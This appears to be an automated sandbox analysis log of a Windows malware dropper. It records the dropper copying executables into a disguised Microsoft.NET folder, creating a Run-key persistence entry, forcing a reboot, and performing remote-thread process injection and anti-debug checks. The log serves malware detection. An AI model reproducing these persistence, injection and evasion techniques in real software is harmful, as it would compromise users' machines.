Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: leg#U00edvel9931-009-140.08372236.exe Static file information: File size 11252752 > 1048576
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x272c00
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x28e400
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb source: 8pIuMUYQX9q.exe, 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000006.00000000.2051733417.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145964148.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000000.2132584136.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, ClassicIE_64.exe.0.dr
Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb! source: 8pIuMUYQX9q.exe, 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000006.00000000.2051733417.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145964148.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000000.2132584136.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, ClassicIE_64.exe.0.dr
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00007FF6B40A1000 LoadLibraryW,GetProcAddress,FreeLibrary,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,CoUninitialize,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,GetWindowThreadProcessId,OpenProcess,IsWow64Process,CloseHandle,GetModuleFileNameW,PathRemoveFileSpecW,PathAppendW,CreateProcessW,CloseHandle,CloseHandle,?DllLogToFile@@YAXPEB_W0ZZ,FindWindowExW,?DllLogToFile@@YAXPEB_W0ZZ,RegisterWindowMessageW,SendMessageW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleW,OpenProcess,GetModuleFileNameW,VirtualAllocEx,WriteProcessMemory,GetModuleHandleW,GetProcAddress,CreateRemoteThread,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle, 6_2_00007FF6B40A1000
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: section name: .xdata
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: section name: /4
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: section name: /19
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: section name: /32
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: section name: /46
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: section name: /65
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: section name: /78
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: section name: /90
Source: leg#U00edvel9931-009-140.08372236.exe Static PE information: section name: .symtab
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe File created: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\ClassicIE_64.exe
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe File created: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe (copy)
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe File created: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\ClassicIEDLL_64.dll
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ng3DJyCjjqIdyv
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_0000000180037F9C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_0000000180037F9C
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Window / User API: threadDelayed 5032
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Window / User API: threadDelayed 1590
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe API coverage: 6.5 %
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe API coverage: 1.2 %
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe TID: 2000 Thread sleep time: -5032000s >= -30000s
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe TID: 5600 Thread sleep time: -3432000s >= -30000s
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe TID: 4632 Thread sleep time: -1428000s >= -30000s
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe TID: 6020 Thread sleep time: -1590000s >= -30000s
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00007FFE1A528EDC FindFirstFileExW, 6_2_00007FFE1A528EDC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_0000000180055750 FindFirstFileExW, 6_2_0000000180055750
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 7_2_0000000180055750 FindFirstFileExW, 7_2_0000000180055750
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1984599299.00000232A23C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00007FF6B40A31EC RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00007FF6B40A31EC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00007FF6B40A1000 LoadLibraryW,GetProcAddress,FreeLibrary,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,CoUninitialize,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,GetWindowThreadProcessId,OpenProcess,IsWow64Process,CloseHandle,GetModuleFileNameW,PathRemoveFileSpecW,PathAppendW,CreateProcessW,CloseHandle,CloseHandle,?DllLogToFile@@YAXPEB_W0ZZ,FindWindowExW,?DllLogToFile@@YAXPEB_W0ZZ,RegisterWindowMessageW,SendMessageW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleW,OpenProcess,GetModuleFileNameW,VirtualAllocEx,WriteProcessMemory,GetModuleHandleW,GetProcAddress,CreateRemoteThread,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle, 6_2_00007FF6B40A1000
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00007FFE1A511800 SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,VirtualFree,SetLastError,VirtualFree,VirtualFree,VirtualFree,SetLastError,VirtualAlloc,SetLastError,SetLastError, 6_2_00007FFE1A511800
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00007FF6B40A31EC RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00007FF6B40A31EC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00007FF6B40A1840 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00007FF6B40A1840
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00007FF6B40A3874 SetUnhandledExceptionFilter, 6_2_00007FF6B40A3874
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00007FF6B40A94B8 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00007FF6B40A94B8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00007FFE1A517ABC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00007FFE1A517ABC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00007FFE1A51EB04 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00007FFE1A51EB04
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00007FFE1A517360 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00007FFE1A517360
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_000000018003924C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_000000018003924C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_0000000180041394 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_0000000180041394
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_0000000180039820 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_0000000180039820
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 7_2_000000018003924C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_000000018003924C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 7_2_0000000180041394 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_0000000180041394
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 7_2_0000000180039820 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_0000000180039820

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00007FF6B40A1000 LoadLibraryW,GetProcAddress,FreeLibrary,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,CoUninitialize,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,GetWindowThreadProcessId,OpenProcess,IsWow64Process,CloseHandle,GetModuleFileNameW,PathRemoveFileSpecW,PathAppendW,CreateProcessW,CloseHandle,CloseHandle,?DllLogToFile@@YAXPEB_W0ZZ,FindWindowExW,?DllLogToFile@@YAXPEB_W0ZZ,RegisterWindowMessageW,SendMessageW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleW,OpenProcess,GetModuleFileNameW,VirtualAllocEx,WriteProcessMemory,GetModuleHandleW,GetProcAddress,CreateRemoteThread,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle, 6_2_00007FF6B40A1000
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_0000000180006380 GetDesktopWindow,GetWindowRect,GetSystemMetrics,GetSystemMetrics,mouse_event,mouse_event,Sleep,mouse_event,GetSystemMetrics,GetSystemMetrics,mouse_event,Sleep, 6_2_0000000180006380
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe Process created: C:\Windows\System32\shutdown.exe shutdown /r /t 30
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: 6_2_00007FFE1A531F20 cpuid 6_2_00007FFE1A531F20
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: GetLocaleInfoA, 6_2_00007FF6B40A8FF0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 6_2_00007FFE1A52E268
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_00007FFE1A52EACC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: GetLocaleInfoW, 6_2_00007FFE1A52EB7C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: GetLocaleInfoW, 6_2_00007FFE1A528048
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: GetLocaleInfoW, 6_2_00007FFE1A52E974
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: EnumSystemLocalesW, 6_2_00007FFE1A52E694
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 6_2_00007FFE1A52E72C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_00007FFE1A52ECB0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: EnumSystemLocalesW, 6_2_00007FFE1A527CB4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: EnumSystemLocalesW, 6_2_00007FFE1A52E5C4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_000000018005B000
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: GetLocaleInfoW, 6_2_000000018005B0B0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_000000018005B1DC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: try_get_function,GetLocaleInfoW, 6_2_000000018004F34C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 6_2_000000018005A7A8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: EnumSystemLocalesW, 6_2_000000018005AAF4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: EnumSystemLocalesW, 6_2_000000018005ABC4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 6_2_000000018005AC5C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: EnumSystemLocalesW, 6_2_000000018004ED7C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: GetLocaleInfoW, 6_2_000000018005AEA8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 7_2_000000018005B000
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: GetLocaleInfoW, 7_2_000000018005B0B0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 7_2_000000018005B1DC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: try_get_function,GetLocaleInfoW, 7_2_000000018004F34C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 7_2_000000018005A7A8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: EnumSystemLocalesW, 7_2_000000018005AAF4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe Code function: EnumSystemLocalesW, 7_2_000000018005ABC4
